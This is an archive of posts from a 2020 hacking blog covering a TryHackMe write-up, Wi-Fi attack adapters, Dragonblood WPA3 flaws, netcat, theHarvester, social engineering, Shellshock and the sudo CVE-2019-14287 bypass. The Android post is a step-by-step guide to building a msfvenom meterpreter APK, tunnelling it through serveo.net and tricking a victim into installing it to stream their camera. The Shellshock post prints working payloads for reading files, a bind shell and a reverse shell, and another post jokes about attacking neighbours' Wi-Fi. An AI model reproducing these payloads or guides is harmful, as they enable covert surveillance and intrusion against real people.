CYBER FLAWS: 2020

Tuesday, September 15, 2020

TryHackMe CMeeS

First Scanning:

i use both nmap and rustscan(if you don't known about rustscan its nmap -p- on steroids)

nmap -sC -sV --min-parallelsim 64 -oN nmap/nmapfile $target-ip

the rustscan didn't gave anything new.

Checking if the website has any sub-domains

wfuzz -c -f sub-fighter -w wordlist.txt -u http://cmess.thm -H "Host :FUZZ.cmess.thm" -hw 290

Target: http://cmess.thm/

Total requests: 4997

==================================================================

ID Response Lines Word Chars Request

==================================================================

00019: C=200 30 L 104 W 934 Ch "dev"

Total time: 0

Processed Requests: 2990

Filtered Requests: 2989

Requests/sec.: 0

Used gobuster for hunting down secret directories but no luck:

Check out the subdomain some good suff there.

got into the CMS of the website:

Now the hint is find what CMS is the website is using and use searchsploit

+found local file inclusion

+go to exploit-db now you know where to go

Thats all for the initial hints if you really want to see the what i did goto my github page and enter the user flag don't bruteforce it.

https://gitlab.com/jdp1369/THM_CMesS.git

Monday, August 31, 2020

There are N number of ways to compromise a Wi-Fi router but generally you can't directly attack because your systems Wi-Fi module does not support Monitor Mode and Packet Injection. And also if you are using a virtual Kali Machine to perform a Wi-Fi attack then certainly you were unable to do so because Virtualized generally uses NAT (Network Address Translation) network which creates a subnet inside your machine where your host operating system acts a router to the VMs(Virtual Machines) so you don't really have a direct access to the real router.

What is Monitor Mode and Packet Injection?

Monitor Mode: or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point or ad hoc network first. Monitor mode only applies to wireless networks, while promiscuous mode can be used on both wired and wireless networks. Monitor mode is one of the eight modes that 802.11 wireless cards can operate in: Master (acting as an access point), Managed (client, also known as station), Ad hoc, Repeater, Mesh, Wi-Fi Direct, TDLS and Monitor mode.

Packet Injection: also known as forging packets or spoofing packets in computer networking, is the process of interfering with an established network connection by means of constructing packets to appear as if they are part of the normal communication stream. The packet injection process allows an unknown third party to disrupt or intercept packets from the consenting parties that are communicating, which can lead to degradation or blockage of users' ability to utilize certain network services or protocols. Packet injection is commonly used in man-in-the-middle attacks and denial-of-service attacks.

Whats the solution?

Solution is to use a new Wi-Fi module which supports the Monitor Mode and Packet Injection, this solution in only viable if you are not using Kali Linux as a VM. But if you are using it as a VM then use an external Wi-Fi adapter.

Which adapter to choose?

Actually here the brand does not really matter that much, here you should looking for the correct chipset. Though the brand like Alfa have better injection rates and less chances of failures, then that of created by the local brands, but according to me chipset is the only thing which matters if you are just started learning Wi-Fi attacks and trying to attempt the attacks.

The following Chipset one should look for in a Wi-Fi adapter:

Atheros AR9271: This one is only capable to attack on a router working on 2.4GHz frequency.
Realtek RTL8812AU: This one is capable to attack on both 2.4GHz&5GHz frequency.
Ralink 3070/2870: It supports 2.4GHz frequency but I don't trust this chipset.

Some Products which I/my friend have used

Alfa AWSS036ACH

Alfa AWUS036NHA [b/g/n USB]
Alfa AWUS036ACH(a/b/g/n/ac) is the best performing card, but the driver can be unstable enough to crash your kernel
Alfa AWUS036ACM (a/b/g/n/ac) is the highest performing of the STABLE devices, but it requires kernel 4.19.5 or higher, and the driver doesn't work on the Raspberry Pi yet
TP-Link TL-WN722N v1(b/g/n) :[NOTE:Only the gen1 not gen2]
Ubiquiti SRX [a/b/g Cardbus]
Ubiquiti SRC [a/b/g ExpressCard]

Where you can buy these things?

You can buy these form Amazon (website), Aliexpress and other well known online retailer but for some local made adapters you can check out your near by computer market and ask about adapters with Monitor Mode and Packet Injection, or you can also find some adapters on Zsecurity.

link to buy from amazon India : https://amzn.to/2PsoBiw

You ask question in the comment section if you have any kind of doubts regarding the hardware.

Saturday, August 29, 2020

DragonBlood WPA3 FLaws

As we known WPA2 has been the latest and the greatest in the terms of WiFi security for a long time now, you might have also already heard/read about the WPA3 and how its going to replace WPA2 as its more secure.

But in mid April 2019 researchers Mathy Fanhouf and Eal Ronan published a research paper in which they analysed the Dragonfly handshake, this is the handshake used the WPA3 replacing the Vulnerable 4 way handshake in WPA, in this paper they detailed a number of flaws that can be used to launch a number attacks against the latest and the greatest wifi security protocol WPA3.

What are the potential threats generated by this flaw?
The major one are as follows:
1.> Recovering the network key
2.> Downgrade Security <wpa3 to wpa2>
3.> Launching DOS attacks

In there research paper "Dragonblood: Analyzing the DragonflyHandshake of WPA3 and EAP-pwd" the mentioned that the one of the supposed advantages of the WPA3 was its more secure than WPA2, due to its underlying Dragonfly handshake, it's near impossible to crack the network key/password.But they found out that even with WPA3, an attacker within range of the victim can still recover the password.

The following CVEs were allocated for these new finding of vulnerabilities:
1-> CVE-2019-13377: Timing-based side-channel attack against WPA3's Dragonfly handshake when using Brainpool curves.
2-> CVE-2019-13456: Informatoin leak in FreeRadius' EAP-pwd due to aborting when needing more than 10 iterations.

DETAILS
Flaws in WPA3

The design flaws discovered can be divided into 2 categories. First category consist of downgrading attacks against WPA3-capable devices, and second consists of the weakness in the dragonfly handshake of WPA3, which in WI-FI standard is better known as the SAE(Simultaneous Authentication of Equals) handshake.The discoverd flaws can be abused to recover the password of the Wi-Fi network, launch resource consumption attacks, and force devices into using weaker security groups.
The following Vulnerability were found in WPA3:

CERT ID #VU871675: Downgrade attack against WPA3-Transtition mode leading to dictionary attacks.
CERT ID #VU871675: Security group downgrade attack against WPA3's Dragonfly handshake.
CVE-2019-9494: Timing-based side-channel attack against WPA3's Dragonfly handshake.
CVE-2019-9494: Cache-based side-channel attack against WPA3's Dragonfly handshake.
CERT ID #VU871675: Resource consumption attack (i.e. denial of service) against WPA3's Dragonfly handshake.

Flaws in EAP-pwd

The EAP-pwd protocol internally also uses Dragonfly, and provides authentication based on a username and password in certain enterprise Wi-Fi networks. It is vulnerable to the same attacks that are discovered against WPA3.On the top of that, all the implementations of the EAP-pwd that we tested were vulnerable to invalid curve attacks, which enable to adversary to complete bypass authentication. Most implementaion were also vulnerable to reflection attacks.

The following vulnerabilites were found in the EAP-pwd implementaions:

CERT ID #VU871675: Overview of attacks specific to hostapd and wpa_supplicant (does not cover other implementations).
CVE-2019-9495: Cache-based side-channel attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
CVE-2019-9497: Reflection attack against the EAP-pwd implementation of hostapd and wpa_supplicant.
CVE-2019-9498: Invalid curve attack against the EAP-pwd server of hostapd resulting in authentication bypass.
CVE-2019-9499: Invalid curve attack against the EAP-pwd client of wpa_supplicant resulting in server impersonation.
CVE-2019-11234: Reflection attack against the EAP-pwd implementation of FreeRADIUS.
CVE-2019-11235: Invalid curve attack against the EAP-pwd server of FreeRADIUS resulting in authentication bypass.

TOOLs
These tools are not designed to attack your neighbor's WPA3<but if you do & not got caught then every thing is good>,

Dragonslayer: performs invalid curve attacks against EAP-pwd clients and server. These attacks bypass authentication: an adversary only needs to possess a valid username.
Dragondrain: this tool can be used to test wether, or to which extend, an Access Point is vulnerable to denial-of-service attacks against WPA3's SAE handshake.
Dragontime: this is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 are supported. Note that most WPA3 implementations by default do not enable these groups.
Dragonforce: this is an experimental tool which takes the information recovered from our timing or cache-based attacks, and performs a password partitioning attack. This is similar to a dictionary attack.

In practice the main risks for WPA3 are downgrade attacks, and possible timing attacks against resource-constrained devices. The authentication bypass attacks against EAP-pwd that are implemented in Dragonslayer are also security critical in practice. Considering the other attacks are non-trivial in practice, and assuming vendors will implement defenses against them, we expect that your neighbour won't abuse them to attack you.

Content Reference :

Tuesday, August 25, 2020

Breaking into android

Hello all, As we know the large part of society is using smart phones , without knowing its adverse disadvantages on their privacy. So today i am going to teach you how to hack android devices with the Metasploit framework on different network.

After getting meterpreter session attacker can do many thing such as:

hack camera live stream.
take screen shots of mobile display.
hack msgs.
call from your number.
gps location.
hacking another devices etc.

PRE-REQUIREMENT:-

Kali OS
Updated Metasploit Framework.
Social Engineering.

This blog is for educational purpose and not responsible for illegal activities .

1.Get the ip address of your network.
for this enter the following command in terminal.

ifconfig

As you can see my ip address is 192.168.23.168 and your may be different from me.

2.Host your local host on internet by port forwarding on serveo.net.

syntax:- ssh -R src_port:ip_address:dest_port serveo.net

example

ssh -R 8565:192.168.23.168:4444

this basically forward the request to your ip address from serveo.net.

3.Make a payload using msfvenom.

msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=8565 -o payload.apk

4.Open a listener to get the meterpreter session.

type :-

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost ip-add

set lport 4444

run

5.Social engineering

send it to your victim by any way and install payload.apk in victim android mobile.

Once it installed and open by victim the meterpreter session has been established as shown below.

6.Exploit

type :

help

as you can see all the command are given.you can do whatever you want.

Example:-

i want the victim camera's live stream

type

webcame_list //this will give you the list of webcam present on your victim machine.

webcam_stream 1 //will give you the live stream as shown below.

Sunday, August 23, 2020

Using netcat for hacking

Netcat is a great network utility for reading and writing to network connections using the TCP and UPD protocol. Netcat is often referred to as the Swiss army knife in networking tools and we will be using it a lot throughout the different tutorials on Hacking Tutorials. Most common use for Netcat when it comes to hacking is setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts and banner grabbing. In this tutorial we will be learning how to use the basic features from Netcat such as:

Banner grabbing
Webserver interaction
File transfers

Banner Grabbing

Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let’s see how this works in practice.

The following command is used the grab a service banner (make a raw connection to a service):

nc [ip address][port]

Let’s try this on the FTP service on Metasploitable 2 which is running on port 21:

nc 192.168.100.100 21

Web server interaction

Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:

nc 192.168.100.108 80

And then run this HTTP request:

HEAD / HTTP/1.0

Apache webserver banner.

The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.

To retrieve the top level page on the webserver we can issue the following command:

nc 192.168.100.108 80

And then run this HTTP request:

GET / HTTP/1.0

File transfers with Netcat

In this example we will be using a Netcat connection to transfer a text file. Let’s assume we have remote command execution on the target host and we want to transfer a file from the attack box to the host. First we would need to set up a listener on the target host and connect to it from the attack box. We will be using port 8080 for this purpose and we safe the file to the desktop:

nc -lvp 8080 > /root/Desktop/transfer.txt

On the attack box we connect to port 8080 and send a file name transfer.txt:

nc 192.168.100.107 8080 < /root/Desktop/transfer.txt

This Netcat reverse connection

It is used in system hacking and web server hacking and also inject in php processing file.

Example

<?php
system(nc 192.168.100.107 8080);
?>

it gives you back connection on port 8080.

After you can listen on your system by :

nc -l -p 8080

Saturday, August 22, 2020

The Harvester

'theHarvester' is a tool designed to be used in Information Gathering Phase of a penetration testing.

theHarvester is a tool used to harvest/gather sensitive information that can help in determining a company's external threat landscape on the internet. Not just company but even individual information of particular users available on the internet. 'theHarvester' largely depends on public sources and the following info can be gathered,

Emails
Names
Subdomains
IPs
URLs
VirtualHosts
Even Port Scanning

TheHarvester Public engine

One of the interesting things about ‘theHarvester’ is that it supports more than one public source to harvest information. These sources appear to be more than 20+ public sources supported by the information gathering tool.

And this public sources that require API include:

SecurityTrails
Hunter
GitHub
Shodan
bingapi
Spyse
Intelx

But if you don't have API you can still use some other public sources

Harvester on ubuntu/other linux based system where its not preinstalled

You just have to have some major dependencies on the system particular python3.6+. Some of its major dependencies include:

⦁ Python 3.7+
⦁ Python3 -m pip install pipenv
⦁ Pipenv install

virtualenv -p python3 theharvester

git clone https://github.com/laramies/theHarvester.git

Source theharvester/bin/activate

Thursday, August 20, 2020

Social Engineering

Spend Millions of Dollars $$ then also got hacked, while your servers ran on the latest security updates and patches, completely hardened, Then it might be a social engineering attack.

Remember the movie "Catch me If you can" , Frank Abagnale Jr used social engineering in almost the whole movie.

There is no single security mechanism/technical way that can prevent from social engineering techniques used by attackers. Only educating employees on how to recognize and respond to social engineering attacks can minimize attackers' chances of success. Before going ahead with this module, let's first discuss various social engineering concepts.

What is Social Engineering?

Social engineering is the art of convincing people to reveal confidential information.

Common targets of social engineering include help desk personnel, technical support executives, system admins, etc.

Social engineering depend on the fact that people are unaware of their valuable information and are careless about protecting it.

Impact of Attack on Organization

Economic losses
Damage of goodwill
Loss of privacy
Dangers of terrorism
Lawsuits and arbitration
Temporary or permanent closure

Factors that Make Companies Vulnerable to Attacks

Insufficient security training
Unregulated access to the information
Several organization units
lack of security policies

Why is Social Engineering Effective ?

Security policies are as strong as their weakest link, and humans are the most susceptible factor
Its is difficult to detect social engineering attempts
There is no method that can be applied to ensure complete security form social engineering attacks
There is no specific software or hardware for defending against a social engineering attack

Phases of a Social Engineering Attack

Research on Target Company {Dumpster driving, websites, employees, tour company, etc.}
Select Victim {Identify the frustrated employees of the target company}
Develop Relationship {With the victim in order to gains its trust}
Exploit in the Relationship {Collect sensitive account and financial information, and current technologies}

Types of Social Engineering

Human-based Social Engineering:

>>>Gathers sensitive information by interaction
>>>Techniques: Impersonation, Vishing, Shoulder Surfing, Reverse Social Engineering, Dumpster Driving, Piggybacking etc

Computer-based Social Engineering:

>>>Social engineering is carried out with the help of computers
>>>Techniques: Phishing, Spam Mail, Pop-up Window Attack, Instant Chat Messenger

Mobile-based Social Engineering:

>>>It is carried out with the help of mobile applications
>>>Techniques: Publishing Malicious Apps, Repacking Legitimate Apps, Using Fake Security Applications, SMShing (SMS Phishing)

Monday, August 17, 2020

CVE-2014-6271/Shellshock

In this blog we are gonna discuss about the CVE-2014-6271 Shellshock vulnerability

This Vulnerability impacts the Bourne Again Shell aka "Bash". Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface aka "CGI".

About the Vulnerability

Here, we are going to focus on the first version of the vulnerability but many more vulnerabilities in the same subpart of Bash have been found since: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187... click here for more info

The source of the issue is that Bash can have internal function declaration in its environment variable. The first version of the vulnerability is related to the ability to run arbitrary commands after a function declaration.

First, we need to declare that the environment variable is a function using (). Then we will add an empty body for the function. Finally, we can start adding the command we want to run after the function declaration. More details can be found in the following email on oss-sec

Apache uses environment variables to pass headers to the CGI. Since it's a Bash based CGI, we will be able to run arbitrary command by declaring an empty function and add a command after this declaration.

What is CGI?

CGI is Common Gateway Interfaces is standard way of running programs from a Web server. Often, CGI programs are used to generate pages dynamically or to perform some other action when someone fills out an HTML form and clicks on submit button.

So when a user sends send the request, it usually needs to be processed by an application program.The Web server typically passes the form information to a small application program that processes the data and may send back a confirmation message. This method or convention for passing data back and forth between the server and the application is called the CGI. It is part of the Web's HTTP(Hyper Text Transfer Protocol).

So if you are creating a Web site and a CGI application to get control, you specify the name of the application in the URL(Uniform Resource Locator) that you code in HTML file. This URL can be specified as part of the FORMS tags if you are creating a form. For eg. you might use the following:

and the server at "somewebsite.com" would pass control to the CGI application called "formprog.rb" to record the entered data and return a confirmation message.

NOTE: .rb indicates ruby language.

The common gateway interface provides a consistent way for data to be passed from the user's request to the application program and back to the user. This means that the person who writes the application program can makes sure it gets used no matter which operating system the server uses (PC, Macintosh, UNIX, OS/390, or others). It's simply a basic way for information to be passed from the Web server about your request to the application program and back again.

Because the interface is consistent, a programmer can write a CGI application in a number of different languages. The most popular languages for CGI applications are: C, C++, Java, and PERL.

An alternative to a CGI application is Microsoft's Active Server Page (ASP), in which a script embedded in a Web page is executed at the server before the page is sent.

Fingerprinting

By visiting the application with a proxy (Burp Suite or OWSAP ZAP), we can detect that multiple URL are accessed when the page is loaded:

To exploit "Shellshock", we need to find a way to "talk" to Bash. This implies finding a CGIs commonly use Python or Perl but it's common to find(on old servers), {Because new ones are generally in Microsoft's ASP}, CGI written is Shell or even C.

How CGI works?

When you call a CGI, the web server (Apache here) will start a new process and run the CGI. Here it will start a Bash process and run the CGI script.

Apache needs to pass information to the CGI script. To do so, it uses environment variables. Environment variables are available inside the CGI script. It allows Apache to easily pass every headers (amongst other information) to the CGI. If you have a HTTP header named Blah in your request, you will have an environment variable named HTTP_BLAH available in your CGI.

Tip's to check vulnerability

You can quickly test this by replacing the call to "uptime" by a call to "env" in the CGI. Then if you call your script with arbitrary header, you should see them in the page.

Being a hacker lets talk about Exploitation

Here we can use a tool known as netcat or you can make your own listener using any programing language.If you want to known how to write a such code please mention in comment section.Here we can also exploit this vulnerability using a proxy with a repeater mode<eg netcat>

Multiple payloads can be used depending on what you want to achieve. You can start by reading arbitrary files by using the following payload:

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: target\r\n\Connection: close\r\n\r\n" | nc target 80

The above payload will read the content of the /etc/passwd and echo it in the response over port 80

NOTE: You will need to inspect the HTTP headers of the response to see the file's content

Binding Shell

If you want to run the command, the easiest way is to bind a shell. Basically you will need netcat (or nc) to listen on a port and redirect input and output to /bin/sh or /bin/bash

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: target\r\nConnection: close\r\n\r\n" | nc vulnerable 80

NOTE: Here, the path to netcat/nc is given. On a real system, you will have to brute force it and it may not be installed. and we are targeting /bin/sh over port 80

Bind shells suffer from a huge limitation: it's likely that a firewall between you and your victim will prevent you from connecting to the port you just bound. To bypass this, we are going to get the server to connect back to us.

Gaining Reverse Shell

We want the server to connect back to us. To do so, we are first going to bind a port on our system. We want a port that the server is likely to have access to, the most common are 21 (FTP), 53 (DNS), 123 (NTP), 80 (HTTP) and 443 (HTTPs) as they are probably used to keep the system up-to-date and to perform every day operations.

We are going to bind the port 443 (You will need to run this command as root or using sudo) using the following command:

$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc ipAddress 443 -e /bin/sh\r\nHost: target\r\nConnection: close\r\n\r\n" | nc vulnerable 80

By going back to our initial netcat, we can now type commands locally and they will be ran on the compromised system.

Saturday, August 15, 2020

Bypassing sudo command: CVE-2019-14287

As the title says the "sudo" command in Linux can be bypassed.So, if you are not familiar with Linux operating system then let me tell you what is a sudo command.

sudo is a program for Unix and Linux like computer operating systems that allows the user to run programs with security privileges of another user, by default superuser, like installing a software in windows OS by using Admin privileges. Sudo originally stood for "superuser do".

According to sudo description sudo allows a permitted user to execute a command as the superuser or another user, as specified by the security policy. The invoking user's real (not effective) user ID is used to determine the user name with which to query the security policy.
sudo supports a plugin architecture for the security policies and input/output logging. Third parties can devlop and distribute their own policy and I/O loging plugins to work seamlessly with sudo front end. The default security policy is sudoers, which is configured via the file /etc/sudoers, or via LDAP.

For more information just type the following command in any linux terminal:
man sudo

Description
A flaw was found in the way sudo implemented running commands with arbitary user ID. If a sudoers entry is written to allow the attacker to run a command as any user except root, this flaw can be used by the attacker to run a command as any user except root, this flaw can be used by the attacker to bypass the restriction.

Statement
This flaw only affects specific, non-default configuration of sudo, in which sudoers configuration entry allows a user to run a command as any user except root, for example:
-------------------------------------------------------------------------
abc myhost = (ALL,!root)/usr/bin/somecommand
-------------------------------------------------------------------------

This config allows user "someuser" to run somecommand as any other user except root. However, this flaw also allows someuser to run somecommand as root by specifying the target user using the numeric id of -1. Only the specified command can be run, this flaw does not allow user to run other commands that those specified in the sudoers configuration.

Any other configurations of sudo (including configurations that allow user to run commands as any user including root and configurations that allow user to run command as a specific other user) are NOT affected by this flaw.

Mitigation

This vulnerability only affects configuration of sudo that have a "runas user list" that includes an exclusions of root. The most simple example is

--------------------------------------------------------------------------------------
someuser ALL=(ALL, !root) /usr/bin/somecommand
--------------------------------------------------------------------------------------
The exclusion is specified using an exclamation mark(!). In this example, the "root" user is specified by the name.The root user may also be identified in other ways, such as by UID (user id):
---------------------------------------------------------------------------------------
someuser ALL=(ALL,#!0) /usr/bin/somecommand
---------------------------------------------------------------------------------------
or by reference to a runas alias:
--------------------------------------------------------------------------------------
Runas_Alias MYGROUP =root, adminuser
someuser ALL=(ALL, !MYGROUP) /usr/bin/somecommand
----------------------------------------------------------------------------------

To ensure your sudoers configuration is not affected by this vulnerability, we recommend examining each sudoers entry that includes the `!` character in the runas specification, to ensure that the root user is not among the exclusions. These can be found in the /etc/sudoers file or files under /etc/sudoers .

BY THE WAY

if you have sudo you can run the following commands to escalate yourself to root.
-------------------------------------------------------------------------------------------
sudo -u#-1 id -u
-------------------------------------------------------------------------------------------
or
-------------------------------------------------------------------------------------------
sudo -u#4294967295 id -u
-------------------------------------------------------------------------------------------
the number 4294967295 is equivalent to 2³² − 1.

References
https://access.redhat.com/security/cve/cve-2019-14287
https://www.sudo.ws/alerts/minus_1_uid.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
https://puppet.com/blog/find-and-fix-cve-2019-14287-sudo-vulnerability
https://www.youtube.com/watch?v=btUf1O7lQmY&t=184s

cyberflaws